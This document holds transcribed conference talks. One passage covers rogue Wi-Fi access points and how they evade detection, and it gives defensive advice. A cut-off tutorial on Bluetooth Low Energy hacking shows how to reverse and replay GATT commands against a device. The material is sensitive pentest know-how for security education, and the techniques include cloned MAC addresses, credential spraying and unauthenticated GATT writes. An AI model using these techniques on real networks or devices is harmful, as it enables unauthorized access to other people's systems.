super silly that this is all that my attack vector is is standing up rogue access point and hoping to fish some credentials. But at the end of the day, it works. And just the fact that it works is scary enough because it's a really old style kind of attack really. Rogue access points like I was talking about, they can lead to stolen credentials if you're using say ePammer to get WPA to enterprise credentials or in the case of Wi-Fi Fisher, you can use that for PSK. So just, you know, share a network key like you probably have at home, you know, and that can lead then to a full internal network compromise. So it can lead to compromise work stations. They can also, it can also basically lead to data being exfiltrated, right? So if if an end user connects to my access point, I can exfiltrate data off that system without it going through any of the normal controls or processes that it normally would. And then it can also allow users to circumvent corporate policies. So a lot of time that say, say your corporate, your corporation blocks Netflix or Facebook or something and users might connect their, their laptop or their mobile device that's work provided, they might connect it to another rogue access point in hopes that that they can circumvent that and that they can watch Netflix that they can do any other basically types of types of activities that would probably be blocked on any other network. So it's one of those things that that end users, you know, may not always get tricked. They might willingly connect to other access points to get to, you know, whatever stuff that they want to that's being blocked by corporate policies. And so this is this is one of these matrices that I kind of like to reference and use. It might seem a little bit dense, but really at the end of the day rogue access points are kind of summed up in this way. So the easiest rogue access point for, you know, corporation detect is an exact match of whatever the SSID is and SSID is just their wireless name. So so say that's like, you know, home network 123. So you would see then a second home network 123 with a MAC address of 0012, you know, all the way through 555. That would be the easiest to detect because that is completely different, you know, than your than your normal whatever your your normal MAC address would be. And that's just a hardware address that that is associated with that wireless radio. The next hardest would be then basically that exact same SSID with just some some random characters that, you know, just randomly a generated MAC address hardware address. Then as you kind of like go down that difficulty scale or up the difficulty scale, you're going to see it's going to be an exact match of that, you know, SSID with then a MAC address that's similar to the MAC addresses of the access points that you run. That might be harder for some, you know, for some intrusion prevention detection software to detect is something that's similar to what would be expected. And then if you're talking about a larger client, say I go to, you know, say they had say it's a bank, right, a bank will have multiple branches say I went to one bank and copied a MAC address from that site and took it to another branch, you know, in the same town or you know, same vicinity where wirelessly they won't touch, but they but that MAC address is at least valid on the network, right. And I stand that up as an access point. Well now the intrusion prevention detection system is not going to detect me because it is technically somewhere in the system. The controller will just not have any idea of the geography behind that. And so that's makes it harder to detect, you know, and then you keep going and then now you can make you say your SSID is just similar but not an exact match to to what that that Wi-Fi would be with again, random MAC addresses and then, you know, similar and then going down that same spectrum. At the end of the day, this is just something that an attacker can use and kind of see like, okay, well, you know, what level of sophistication does your does your monitoring hardware, you know, in detection system, what does that look like? Because for example here, say you were looking for an SSID that matched exactly and it was cloned from a MAC address of the same site. Well, what happens if there's some weird reflection or attenuation there that makes your wireless signals bounce from place to place? Well, if you're doing detection on a MAC address seen by different access point, now all of a sudden that gets a lot harder and a lot more complicated of a thing to program and it's probably going to generate a lot of false positives. So it's one of these things that at the end of the day, it's easy to say, oh man, we need, you know, row access point detection or row access point detection really is an entire, you know, suite of what is an attacker doing. And so it's really important just to kind of break down that nuance and see that, you know, some clients might, might see an exact match of 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, or maybe even random, but similar to known access points or cloned from a different site or the same site. That's typically not going to get picked up and it allows an attacker like myself, who's already, you know, attacking wirelessly and is not going to be seen. It allows me to basically not trigger any logs or trigger any detection, which again, you know, is there some software that can detect that? Absolutely. How many clients actually run it? Not a lot. Again, I probably didn't been detected less than 5, 10% of the time, which is kind of surprising. And this kind of brings me into simple is not the same thing as easy, right? Like all of these things that I've talked about, they're simple to understand, but they may not be that easy to configure, right? And that's an important distinction because just looking for excessive password spraying, you know, watching for devices that continually try credentials over and over and over and over again, there's been a number of sites where I basically just sprayed an access point with user credentials that I got off LinkedIn with the attempt of trying to authenticate to their access point. And eventually it worked. Sure, it took a long time. I spent all night trying to, you know, associate with credentials until a pair of them worked. But at the end of the day, that's all that it took. And if somebody was watching their logs, they would have seen, wow, 10,000 attempts. That seems a bit strange. But again, a lot of people don't look at their logs. And is that a simple thing for me to say? Yeah, absolutely. Is it easy? Definitely not. And then same thing, get alerts from rogue access points. A bunch of my clients will have, you know, software or some type of a controller available to them that will actually look for rogue access points. I mean, at home I run Ubiquiti. And it will, you know, if I check that box, it will determine, you know, hey, there's a rogue access point detected. I'm going to send you a push notification to your phone. There's a lot of end users, a lot of clients, a lot of corporations out there that don't even have that box checked. And even though their controller, even though whatever software they have is capable of seeing it, they don't even check the box. So they'll never even get that notification, even though their software, their controller, whatever it may be, has that, you know, out of the box as an option. And then have a plan to what to do when you do detect a rogue access point. That's one of those things that's like, cool, you detect a rogue access point. Now what? You know, depending on the size of your site, that might be just, you know, taking a walk around the office, or it might be trying to take a walk around a multi-acre, you know, area, or an entire campus, or an entire outdoor place, or an entire sporting arena. And so it's one of those things that, you know, you have to plan to the scale of your corporation, your company, your organization, whatever it may be, is to, you know, how are you going to locate these? Is your controller software, is it capable of saying, you know, this was seen from this access point or from this location? Or is that something you're going to have to deploy? Is there going to have to be somebody trained in that? A lot of times it's not enough just to detect them. You have to locate them to see, you know, is this somebody that was doing this nefariously, or is it, you know, some error in the system? Being able to distinguish that and being able to have a game plan for when that happens will make it less of a panic situation, right? And a lot of that is having a wireless pen test, right? Like knowing where your weakness is lie before you actually have to, you know, rely on your logs and rely on your locating, relying on pretty much everything, right? Really log your data. It's one of those things, it's simple. It's not easy, like to log your data and look at your logs. Because a lot of the times when I'm doing something, when I'm pen testing, all that data is probably logged somewhere or at least can be enabled or there's some logging software or, you know, something available to you, but people don't look at their logs, you know, SysAdmins have a busy job and typically don't look at their logs or really investigate that stuff or there may not even be a person dedicated to just wireless. It might just be the network security team and they don't even bother to ingest, you know, their wireless logs that are being generated. So again, all of these things, they're really simple. I feel a little bit sheepish giving to talk about how simple these things are. But each and every one of these things, you know, I haven't been done when I've been on a pen test at times and it's allowed me to compromise a full entire organization, you know, because any number of these, you know, or combination of these weren't done. But again, they're simple, but they're not easy to enact. And it's just one of those things. Again, these are simple ways that somebody could get in that typically aren't covered. Now okay, so like kind of switching gears, there's a bunch of other information that wireless devices emit and there's far more than this, but I just kind of want to give out the basics of it. But really devices, you know, they can allow users to be tracked, you can identify the type of device. You can see what devices are connected to what networks, just using tool like Airdump, which again is a super old tool, but still works great. You can take a look at the screen and if you're not familiar with the screen, then I'll kind of explain it right now. So if you look at the top left corner, there's BSS ID and that is basically, you know, the access point hardware address. And then down below you see the access point and then devices connected to that access point. And if you just take a quick look, you can see the power levels will kind of associate roughly with, you know, distance away from that access point, the power levels, what you'd be looking at. And then if you can see devices that are connected to that access point, well MAC addresses are basically handed out, or at least ranges of them are handed out to hardware manufacturers and they can be identified by just a couple of octets. And so if you were to plug in, so if you have a holo, I'll switch back. If you look at this, you'll see that basically, you know, that 18B430, if you're to plug that into Google, what that gets you is that it says, oh, that's Nest. And so from that I can say, okay, well, maybe they have a Nest camera on this network. Should I look for Nest cameras? You know, maybe there is a Nest thermostat, you know, and you can basically as an attacker, I don't need to know what your username, your password is. I don't need to know, you know, really anything else about your company organization or wireless networks because I can see all of that in the clear. I can see, you know, what the least types of devices are connected. And so really it's one of these things, I know I'm going to keep saying it over and over and over and over, but it's simple to detect somebody like me on your network, but it's typically not easy. And really I just kind of want this to be one of those wake up calls that, you know, if you are a sysadmin, if you do control wireless networks, to kind of take a look at the security policies, the monitoring capability that you have, because at the end of the day you don't want to be scrambling if you do detect something or if you do detect a breach or some weirdness. And again, I think just going back to this last slide and showing, you know, check for password spraying, you know, check for any rogue access points that are in your area, have a plan on how to locate them, you know, understand what data somebody like me can see, you know, know how far your access points, you know, broadcast, you know, log the data that you do collect, that you have the capability of collecting and then look at them from time to time and notice if there's anything strange or weird, and then maybe build some policies out to alert you if anything funky does look like it's happening. Again, I think this is all simple. It's not easy always to configure. So hopefully that was helpful. I will be around in the wireless village if anybody wants to send me questions, and maybe I'll add some contact information to this on the page after it gets posted. But again, I hope it's helpful. I know this may seem like a super one-on-one easy mode talk, but each and every one of these aspects is something that, you know, one of my clients has potentially not done that has led me to compromise their organization. And if everybody looked at this and kind of had this in the back of their mind, if you're a sysadmin that controls networks, or maybe you're not even a sysadmin that controls your wireless networks, but you could bring this to them, it would go pretty darn far. Because at the end of the day, everybody has logging in place for their external network infrastructure and for their internal network infrastructure. But wireless for some reason is the extension of your internal network beyond your walls potentially. And it can let somebody like me, or somebody worse than me, somebody who actually is trying to do some harm to your network in, and you won't even see them. You won't even know that they're there. They will be, you know, for your eyes unseen. Again, hopefully it's helpful. I know this may seem like kind of like a one-on-one-ish talk, but it might be something that you need to hear. So take it forward. It's worth. And if you have any questions, feel free to contact me and I'll be in Discord. All right. Of course I'm in Discord. All right, Areas.
|
Wireless security is often overlooked, or deemed "good enough". However, for many companies, access to the corporate Wi-Fi means direct access to the internal network. This talk will demonstrate a variety of opening attacks performed by threat actors whose goal it is to infiltrate your organization. These tactics are detectable to the vigilant sysadmin, but all too often go unnoticed in a sea of log files. Check out this talk for access to the "Free Public WiFi".
|
10.5446/51660 (DOI)
|
Hey everyone, welcome to the basics of breaking BLE. I'm Freaky Sun. I want to thank you for joining me and I want to thank the wireless village for featuring me today. Also I want to thank Defcon for going into safe mode and allowing us the space to interact and learn with each other. I've got a few things planned for us today. We've got some just going over the basics of what BLE is as far as the technology, just how expansive it is. Some kind of tools and techniques that you can use for pen testing or just exploring Bluetooth low energy devices around you. So as you can see here on the desk I have a few devices. We have the bomb badge from DC 27 Team Einds. We have HACNAR's BLE CTF. If any of you have seen any of my in-person talks, I usually try to feature this piece a lot. I feel like it's a very easy entry point for people to learn how to interact with GAT services on Bluetooth devices. So going on we also have a Thingy 52. This is a development tool and learning tool from Nordic. This has its own application that you can interact with sound and different gyroscopes and LEDs and all sorts of fun things. And then of course we have NODXOR's DC 27 badge that has a Bluetooth mesh network on it. We'll look at some of this and some interesting things that I found on the badge poking around looking for demonstration items for today. We actually also have the LG Phoenix LG 150. This phone is important because it's the only one that I have found so far that allows for live capture of the BT Snoop file from an Android device into Wireshark. I feel that the live capture is important when you're auditing devices because you can actually see the command interactions between devices and the changes in real time. If I hit this button and this command comes across the wire then it's probably pretty obvious but that is the command that's controlling that. And if you can see a difference in the variables then you have an easier time in reversing the commands and actually being able to find meaningful exploits or meaningful ways of interacting with devices. So going on the last item that we have is the Adafruit Bluefruit LE. This has some services that I built on it for DC 27 actually. So we will look at actually cloning this device and spoofing it against a target. So just a short introduction to who I am. My name is Maxine Filtcher. I also go by Freaky Zinn online. Security consultant with IOActive, Sarmie Veteran, graduated class 2020 with the BS in Info Assurance and Cyber Security. I also have a minor in Law and Policy. I'm also a member of the Sands Women's Academy 2018 cohort where I earned the GSEC, the GCIH, and the G-PEN. I am also in the process of studying for the GAWN. So just a small disclaimer, I'm not a Bluetooth developer by any means. But I have been teaching about Bluetooth hacking and just general Bluetooth concepts for a couple of years now. So I feel like I am fairly well-versed in this topic. So in any of my demonstrations, I always like to frame wireless security as greater than just Wi-Fi or just Bluetooth. In PIN testing, when we see companies talk about wireless PIN tests, generally they are talking about their Wi-Fi. And they are completely ignoring a lot of other vectors that could occur with wireless. So I always like to bring up this definition, I guess this contrast in definition. This weak definition from Wikipedia where it's wireless networks, which I mean I guess could be broadly interpreted. But I much prefer the NIST, which I believe is still current, it may have been updated. But the NIST definition of wireless enabled technologies, I feel it's more encompassing of everything that you could encounter. So we talk about wireless, just kind of continuing that discussion. And many different technologies, we have Bluetooth, Wi-Fi, ZigBee, RFID, NFC, Cell, SAT. And these come into a number of different industries. So medical is one that is growing pretty rapidly as far as Bluetooth low energy. And then of course IoT, the things around us, all these smart devices that really rely heavily on Bluetooth low energy to communicate. Then Industry 4.0, Bluetooth is starting to get more into automated systems within factories and smart buildings. And also smart automated HVAC systems or just building control systems. So Bluetooth is really starting to make its way into these important and sometimes high risk systems. So Bluetooth is becoming more of an important research topic and target for actually pen testing as we go and as the technology develops. So just a few basics about Bluetooth. You'll find it within the ISN band. So 2.4 to 2.485 gigahertz in this case for Bluetooth low energy. It comes in a few different flavors, you could kind of call them. Although the protocol stacks are different in some ways and similar in some ways. The original Bluetooth that came out, we refer to as Bluetooth classic or enhanced data rate. Any more you will find that in things like wireless headsets. So your Bluetooth headsets, anything where you're streaming data that needs larger packets and maybe higher throughput. That will generally go through on Bluetooth classic or BREDR is what it's known as now. Bluetooth low energy is what it is described as, it's a low energy protocol. It's intended to be used in devices that could run on a coin cell battery for up to a year. So that's a pretty heavy design specification for something that is low touch. You can put it somewhere and it's supposed to be able to work and you're not supposed to worry about the power and you can interact with it all day long. Something new that's emerging and I mentioned it with the Nodexor badge is Bluetooth mesh. Bluetooth mesh is actually, you can kind of think of it as a hat that goes on top of Bluetooth low energy. It uses some of the underlying components but it adds things like provisional keys and application keys. It's a mini to mini connection and it's very interesting. It can use pathways across other devices instead of nodes. It's a very interesting portion of the protocol but we aren't really going to get into Bluetooth mesh too much. So just some other numbers of course, you know, Bluetooth low energy is blowing up still all across the world. All these different technologies, I'm sure you have more than a few Bluetooth low energy devices around you right now. I also love to throw in little tidbits of history about Bluetooth. I think it's got kind of a fun origin with the name and kind of the intentions behind it. So you can see that if you've ever wondered where the Bluetooth symbol comes from, it's actually a mixture of two runic symbols, one for H and one for B. And this is actually for Harold Bluetooth who was the king of Norway and Denmark. He was seen as a great unifier of these countries and brought together these nations. If you've watched Vikings, the History Channel series, you might recognize the guy whose picture I've pasted up there but yes, it's loosely based on the same person, on the same historical character or figure. Another person that I really love that is integral to the development in Bluetooth but not really in sort of a direct creating of the protocol or anything like that. But Hedy Lamar, I love the story of Hedy Lamar. I love the story of her totally being just underestimated but being so brilliant. And for those who aren't familiar, she was an actress in the early part of the 20th century. And she came from Austria, fairly scandalous kind of background, had left her husband who had decided to supply arms to the Nazi party. She came to the United States and she befriended a man named George Anthle. And together they worked on a concept for creating a torpedo that was basically protected against jamming or the interruption of the signal, whether that was intentional or unintentional for torpedoes that were fired from either submarines or allied ships. A lot of times these torpedoes, when they were fired, they would either get jammed or they would lose connection and sometimes they could actually backtrack around and hit the ship that fired the torpedo originally. So this at the time was actually a fairly large concern and it was something that was kind of an operational hazard that you had to put up with. And together they came up with this concept of frequency hopping spread spectrum. And this is where two devices, two transceivers would have the set channel hopping or would have channel set within them that they would hop across at a set interval and at a set rate. So once these were loaded in, they would hop across the frequency spectrum in a way that would skip just pinpoint jamming or just any kind of natural interference since it was skipping across frequencies. So this was actually a fairly unique idea at the time. It was based on player pianos, as seen to player pianos, which is kind of cool. If you have more interest about the story, there is an amazing documentary on Netflix called the Hedy Lamar, or Bombshell the Hedy Lamar story. Highly recommend that you check it out. It's a little bit sad, but if you're curious about the background, it's a really amazing story. So let's get into a little bit of terminology. So as far as devices within Bluetooth connections, we can think about devices in two ways, central and peripheral. So your central devices are generally going to be your phone or the device that the user is actually interacting with. So whether that's a tablet or a laptop or a TV or something like that, where it's actually initiating the connection to whatever peripheral device, any kind of device that you're going to connect to that's a peripheral device. It's not something that you are directly interacting with with an application on your phone. That's generally going to be a peripheral. So connections are also something that's important in Bluetooth, obviously. It's a wireless protocol, so there has to be some sort of way the connections are handled. Bluetooth Low Energy, just like Bluetooth, has set channels where it advertises itself on or to central devices that may be looking to connect to it. So it has three set channels. The Bluetooth Low Energy has three set channels that it will broadcast across 37, 38, and 39. And there are also four advertising PDU types. I won't go over those, you can look them up. They don't really have too much impact on what we're going to talk about today. So we also have 36 channels for Bluetooth Low Energy, separated by two megahertz across the spectrum. And when we're also speaking about connections, we think about them in two phases, sort of. Once you see the advertising of a device that you want to connect to, say, from your phone, you will initiate the pairing process. I'm fairly confident that most people are familiar with the pairing process. But it's where you initiate a wireless connection. And these come in kind of two phases. So you have your basic pairing session where you're unbonded or you've passed your short term keys between the devices. So they have established a connection, but it's not trusted on certain levels. And it's not been placed into the devices that have been placed into each other, sort of trusted devices list. So once you create a bonded connection, that will actually, those devices are actually transferring long term key information between each other. In most cases, they'll go into a trusted device list, so that either the short term key pairing process can be skipped, or there's no need to even initialize the pairing process again at all. You can just, you know, whenever you're in proximity of the device, it will just automatically connect to you. So that's one of the benefits of bonding. Another benefit of bonding is you will oftentimes have greater leeway in the amount of kind of tolerance for fuzzing on a device. So if you just have a short term key pair with a device, and you try to start fuzzing GAT services, there's a good likelihood that that device will end that pair. Once you've bonded with a device, there is a greater chance that that connection will survive any kind of fuzzing that you do onto the GAT services. So we can talk a little bit about sort of the evolution of the Bluetooth protocol stack. We talked about how it kind of comes in multiple flavors, and you can see that we have classic BREDR there. And then you can see the hybrid version of smart ready, and now Bluetooth smart, which most new Bluetooth low energy devices coming out should be Bluetooth smart. Although most phones will have the ability to use BREDR in the case of, say, Bluetooth headphones or that sort of thing. There is also a new audio protocol that is coming out, a new Bluetooth low energy audio protocol. It was announced earlier this year. I haven't personally seen a lot of specifications on it, but I'm sure that there are people that can answer lots of questions about it already. But it's interesting. I'm excited from a security researcher perspective to get my hands on some of the devices, just because it sounds like it might have some issues, but we'll have to see. So yeah, just some of the basic components of the protocol stack that we're going to really pay attention on today is GAT. I've already mentioned it a couple of times, but it's the generic attribute profile. These are where the profiles of the services that a device can offer are stored. So you can think about this as sort of a catalog of things that a device can do. Whether that's measuring heart rate or giving temperature or measuring humidity levels, there's a GAT service and there's a way for that information or that service to be interacted with. So there is a way to retrieve that temperature or that humidity measurement through the GAT services. Primarily, we're going to be interested in GAT services today. Okay, so we've already talked about that. So when I talk about GAT hacking, what I'm really talking about is the abuse of read or write privileges on a device over their GAT services. So in the case of iOS, read privileges can be abused fairly easily and you can do things like retrieve the cell phone username, the battery level, the OS version, which may not be such an issue on the surface, but once you start poking lower into the protocol or into this vulnerability, especially with the proof of concept called Apple BLEEE, you can see that there are some significant interactions that are available over GAT and there are some very significant information disclosures from iOS. So a few simple write privilege abuses that I have seen in devices that I've pen tested are just sending simple codes. So picking out of a GAT service and I just start fuzzing codes. In some of the real world cases that I've seen, writing the hex value 0x08, and that enables me to set up a new pin between the devices. So now I'm defeating one of the very few security measures that you have for controlling Bluetooth connections. Further still, I've been able to achieve over the firmware update mode. So writing 0x01 to a GAT service will actually allow you to push firmware to a device. I mean, you obviously could get lower interactions than potentially placement malicious firmware onto a device and then who knows, you'd own that device then. Other devices I've seen like write 0x02 to a GAT service, a specific GAT service, and it would start a heating cycle on a device. So potentially there is danger there. So Bluetooth low energy does have security. It's developed through the years, mainly in response to security research that's been done, where a big set of vulnerabilities comes out and the technology has to respond to that in kind of a dynamic way or they risk really losing their customer base. So Bluetooth SIG has done a fairly decent job of responding to security researchers and trying to get chip manufacturers and developers on board with everything. But yeah, so there's a lot of space for growing and there's also a lot of space for research. So Bluetooth low energy has currently, I would say the standard would be 4.2, although BLE 5.0, the new standard that came out has some pieces that strengthen the just works pairing by introducing some nonce values. The more entropy, the better. We have protections against man in the middle. We have protections against eavesdropping and theoretically there's authentication via pairing and bonding, but we can see that oftentimes it's not the case and that can be abused pretty easily. So some of the Bluetooth vulnerabilities that have come out in the past, once I started getting into Bluetooth pretty heavily, BlueBorne was pretty fresh. It was fairly new and it seemed to scare a lot of people. That's when I noticed Bluetooth security research really kind of starting to kick up again. It seemed like it had died off before that. And since then there have been major vulnerabilities that's released every year. I think there were two, well SvinTooth was released earlier this year and then there was a new set that they released, a new vulnerability set that they released just a couple of weeks ago for SvinTooth. So interesting piece about or interesting trivia piece about SvinTooth. It's actually named after the son of Harold Bluetooth. So kind of cool marketing piece that they did in there. So SvinTooth, since it's brand new we'll talk about that, really starts to attack the protocol in ways that I personally haven't been testing it and just fuzzing the header values and fuzzing the protocol in a way that just makes things stop working. There are a lot of denial of service vulnerabilities within this, a lot of deadlock security bypasses that are included within this. And it's fairly expansive. There are a lot of vendors that are impacted by SvinTooth. So a pretty cool piece of research. I personally haven't had a lot of time to jump into it but I have read through it quite a bit and it's pretty interesting. These are just a few of the Bluetooth tools out there that you can use. Some of these are proof of concepts but they have neat scripts that you could either alter or actually just use as they are. So the first tool that we're going to look at is the UberTooth 1. Let me switch over here and so I have one right here. So older device, it's a few years old, but it's still probably the best way to ingest externally viewed Bluetooth packets into Wireshark. And I say externally because this is what I consider to be looking from the outside in to a Bluetooth connection between devices. So generally you won't see a lot because things should be encrypted. Although I have seen some devices that say they are doing things but they aren't actually encrypting things so you're able to pull commands out of the air. But this is still probably the best tool that you can use for that use case for trying to check encryption or trying to check a device connection for its strength against eavesdropping and passive sniffing. So the GreatFet 1 is a tool that's still currently in development I would consider. The Quincy was announced as the first sort of hat that was going to be added to this add-on hat and it would allow for full spectrum sniffing of Bluetooth low energy. So instead of having to use an Ubertooth which is locked into one advertisement channel at a time you would be able to sniff all 36 channels at a time and be able to see basically all the Bluetooth information that's going on. So much easier to kind of manage as far as mass sniffing operations. But as of yet today there's still no release date and I haven't heard anything about a price. Maybe that'll change with DEF CON coming up so this is being recorded beforehand so maybe there's already been an announcement and if that's the case then disregard this portion. So another tool that you probably won't get to use or probably won't see unless you have a lot of money or you work for a bigger employer is the ELISIS system which relies on SDR and it's the same kind of concept as the Quincy in that it's looking to do a mass spectrum capture. So it's trying to capture all of the Bluetooth packets that it possibly can and then you can go through there and sort it by connection and see everything. This system will go even further and in some cases will strip the encryption off of the packet so the software is actually pretty cool. I've had the chance to use one of these systems and yeah it's a very powerful tool that you can do a lot of really meaningful research with but there is a huge price tag associated with it. So that brings us to NRF Connect. NRF Connect is what I generally use on engagements first so I will exhaust every avenue possible with NRF Connect because it's free and it installs on any smart device so or well you know Android or iOS. So it's highly available it's extremely simple to use it allows for abuse of GAT services it also allows for cloning and spoofing so it's a fairly useful tool. So that's where I like to start all of my engagements with because if I can prove that there is impact from this free and highly available tool then the chances are then you probably have larger problems and someone with more technical ability or more powerful tools is likely going to be able to have even greater impact on your systems. So you know let's take a sort of low hanging fruit first approach. So I always start with NRF Connect you know it was intended for debugging but it works wonderful for the purposes that I need. One of the great things that you can do with this is record macros so sometimes devices will only allow for momentary connections just long enough for two devices to basically pass short-term keys and decide that one device say that I don't want to talk to you because I don't know who you are. Well it's still in that period of time there may be two seconds three seconds where you have the window to actually send GAT commands in and if you can capture that and potentially send a command to a device you may actually get interaction with it even though you're not establishing a long-term paired session bonded session you're just that momentary connection so I really enjoy the macro feature and of course you can also export the logs which you know help for reporting. NRF stiffer we won't actually talk about so BetterCat is a tool capable of interacting or allowing you to interact with GAT services of a device but from a Linux machine using a BLE dongle. So Kismet has the ability to do this too but I feel like BetterCat has a slightly better UI for this but it can be a little bit difficult to install but yeah you have the ability to send requests and commands over GAT so it's still a very powerful tool if you're interested in in doing this from a laptop or you know a desktop rather than a mobile device. Another powerful tool from a desktop machine is Scapi. So Scapi actually will allow you the ability to script and this is very powerful once you start looking at these deeper interactions so if you wanted to follow along with the SvenTooth vulnerabilities you could actually craft packets using the Scapi library to attack those specific pieces of the protocol and you know push different kinds of data to them and potentially push them over so if you're looking to do that deeper kind of penetration testing or research on Bluetooth energy low energy Scapi the Scapi library is definitely something you'll want to check out. Another essential tool that I use on just about every one of my pentests for Bluetooth low energy devices is Android debug bridge. For those of you who might not be familiar with this this allows you to create a PC interface to your Android device over USB. Generally most phones won't allow you to do the live capture of BT snoop logs which is where Bluetooth low energy connections and data is logged to. So in the case of the LG phone that I have here the LG M150 that will allow for us to do a live capture into Wireshark and we'll actually look at this here shortly. So just some basic installation instructions if you're not familiar with ADB very simple to set up very easy to get going and use. So I mentioned Kismet earlier if you're not familiar with Kismet it also supports Bluetooth low energy but it has some limited functionality but they may be increasing that as we speak. So that that that tool is definitely growing in its functionality and its capabilities every day. And we've mentioned Apple BLEE a wonderful proof of concept for the security issues that are really inherent within iOS Bluetooth low energy stack. This is a lot of fun. I've done some private talks where I've actually attacked entire rooms full of people and AirPods are popping up on everyone's phone. So it's a lot of fun. But it can also be scary for Apple users to see that you can get that much interaction with their devices just through Bluetooth low energy. The Blueborn scanner it was deprecated but I've actually seen it back on the store or on the Play Store and I can still download it and still use it. But the likelihood that you're going to find a device that is actually still vulnerable or pops up as vulnerable is going to be highly unlikely at this point. Most manufacturers have patched or updated things against this. So it used to be a couple years ago you could walk into a Best Buy, run this Blueborn scanner and almost every TV, every display TV that they had on smart display TV would pop up on the on your Blueborn scanner and would give you all kinds of information. And then from there you could actually use proof of concept scripts to actually attack these TVs. But you know, that's those are different stories. But as far as I know, Blueborn is pretty much patched up and is no longer a risk. So a few challenges that we run into in Bluetooth low energy as far as you know, security researcher challenges. Most of the modern connections are encrypted. So they're hard to see from the outside. So unless there is a companion application on Android that I can use the Android debug bridge on, it's very hard to reverse commands. You know, the Uber truth can follow connections, but I can't see inside of those connections that are encrypted. Crackle is largely ineffective anymore for breaking pins. So, you know, good luck breaking pins. I know that there has been some research done in, in attacking the entropy levels of the pins that are generated. So that's kind of been a potential. But as far as I know, there isn't a reliable way of breaking pairing pins at this point. Commercial sniffers are also really expensive. And the cheaper cheaper alternatives really don't outperform the Uber tooth. So a few approaches to BLE. Sniff the broadcast traffic. So look from the outside in first. Is it encrypted? What can you see basically? What are they leaking? What could you potentially do without any kind of interaction with the device? Is there any kind of information leak? Are there any issues with configuration? Yeah, that sort of thing. The next step would be to look from the inside out using something like Android debug bridge and looking at the unencrypted packets that are coming in. So Android debug bridge allows you to look at the Bluetooth low energy packets once they've crossed over the HCI threshold. So they've been stripped of the, of the encryption layer and you can actually see the commands that are getting sent over the wire. Attempt out of app connection. So just try to, you know, use nrf connect, connect to a device, see if you can create a paired or a bonded session, and then just start buzzing values and see what interaction you get. Sometimes, you know, you'll get devices to lock out. Sometimes you'll get devices to actually do what they're supposed to. Sometimes you hit the trigger. And then the next thing is to spoof a device or check for cloning protections within the application itself. So these are kind of the four things that I really look for in a pen test. So hopefully that helps you kind of frame and contextualize what we're going to look at here in a second. So let's get into some hands-on stuff. So short list of equipment. The Nordic thingy 52, Bluefruit LE, the LG M150, the Samsung S20 I'll be using as the victim. But I will also be showing you the screens that the attacker would see on that phone. It's just kind of a technology and display matter at this point. So, and then we'll of course be using InterfConnect. We'll be using the thingy app, then the Bluefruit Connect application will also be using ADB and Wireshark. For an external scan, we're going to start with Uber tooth. And we're going to go through the basic setup. I just set this up on my computer. If you go to the the GitHub page and go to their wiki for the Uber tooth, there are really good setup instructions. You just go line by line. I didn't have any issues on the newest version of Cali, so hopefully you don't. But yeah, you never know. This is where we will be using ADB to do a live capture of the BT Snoop file on our LG M150. So, let me get the phone hooked up here. We are going to launch ADB. So, we would launch by using ADB start server. Mine's already started, but we'll just hit it again. And then we use ADB devices. And you can see our LG M150 is right there. So, I plugged a different phone in. And we can see the device that I'm using here to capture the BT Snoop file on. We go over to Wireshark, which I already have started. And we can see that we have this BT Snoop interface that's opened up here. Now, it's important to note that the LG M150 has to be running Android version 7. So, I just tried this a second ago with a different LG that I have, and it's running version 6. And it does not open up the BT Snoop. So, you'll have to actually update the version of Android. Luckily, we have pre-recorded videos this time, so I can go in and actually edit out some of that stuff. So, we have our BT Snoop file here. Let's go ahead and start the sniffer. So, our sniffer is now running from our phone. So, I have the phone connected here. And what we can do is start trying to connect to devices. So, for instance, I have this thingy52 on the desk here. I can turn this on, and I can open up Interf Connect. And you'll see the packets are starting to come in here. So, we can see I'm going to connect to the thingy device here, and you'll see the packets start to change. We can create a connection to our thingy52 using the thingy connect app. And now that I'm connected, I'm actually reading data from this device, from the thingy52 onto my phone. So, I can do things like play sounds. Now, that's as I'm pressing here. You hear the sound on the thingy52? So, those commands are coming through the GAT services. Commands are being written from our phone to the GAT services that are being offered on the thingy52. So, since we have this hooked up in an internal fashion, and we can see these packets, we can actually see what commands are controlling what. So, if I hit this tone, we can see that there are packets coming across. Send right here. And this is the value that's being written to that GAT service. So, let's try a different key. Okay. Let's see if that value has changed. You can see it's changed to an 8, from a 5 to an 8. I would also suspect that 1 is the on and off, right? So, the first right is the on, the second right is the off. You can see all f's in the middle there, and then we see all 0's in the middle. All f's, all 0's. Okay. So, that's a pretty basic look at how we see commands, and we're able to reverse command values that come across the wire internally. So, how do we actually then interact with or take this information and use it to then test if there is any unauthorized access to the GAT services, or if we can get any interaction to the device from an unauthenticated source? So, let me bring up the screen here, and I'm going to use my victim device here, or in this case, my attacking device, to actually seek out the thingy52 here over nrf connect. So, this would constitute an out of application connection. Since the thingy52 has an application that controls all of the interactions, using an application like nrf connect to directly interact with the GAT services would be considered an out of app interaction. So, let me scan. So, we have this thing here, that's my thingy52. We'll go ahead and connect to that. So, you can see right off the bat, we have a connection, but it's not bonded. You'll also notice up here in the right hand corner is the DFU button. That will actually allow us to push firmware updates over the air. So, not all devices, and most consumer devices will be locked down from this, but not all devices will have this. But if you do see this, this would constitute a fairly major vulnerability in this device, especially since we have a short-term connection, since there hasn't been long-term key information passed. Let's go ahead and open up our sound services. So, when we were looking at the other screen here, let me go to Kelly and phone. So, when we were looking at the other commands that we captured from the internal, from the ADB capture, we saw our read and write commands. So, those were being written to the handle 005B, and that was in the sound service. So, let's look in the sound here. So, if we open up the handle, we can see the full UUID there. Okay, so the thingy speaker data characteristic is what we saw being written to. So, we can actually use this upload command. So, we have write permissions to it, and we can use this value that we have here. So, we have 8701FFF5A. So, let's try and push this. This was a write command. So, let's make sure that it's placed in command. You have the option between request or command, and this was sent as command X52. So, we'll send it as a command, and we'll see if we can get any interaction here between our device and our attacking device. There it is. There it is. So, we're now attacking from there, and just like I thought, so the all F command is the on command. So, when we saw the write, that was the F. So, we've sent it the option to be on. So, it's on right now, and you can hear it in that tone. So, now let's write the off command. So, that was 8701 0005A, and we send that as a command, and now it's off. So, that is a very robust look at your basic GAT hacking. We abused an unauthenticated out-of-application connection to a device, our thingy52 in this case, and we used a command that we reversed from other information into getting this interaction from an attacking device. So, say this was something else. Say this was, I don't know, I don't know what kind of user device you would have, but say it had some purpose, and you had this in your pocket, but it also made noise like that. And say somebody had reversed these commands and knew that these devices were vulnerable, or that you could just arbitrarily write these commands to GAT services. So, if you could walk around, identify that these devices were, or when they were in proximity, you could automatically attack these devices so that everybody was walking around that had one of 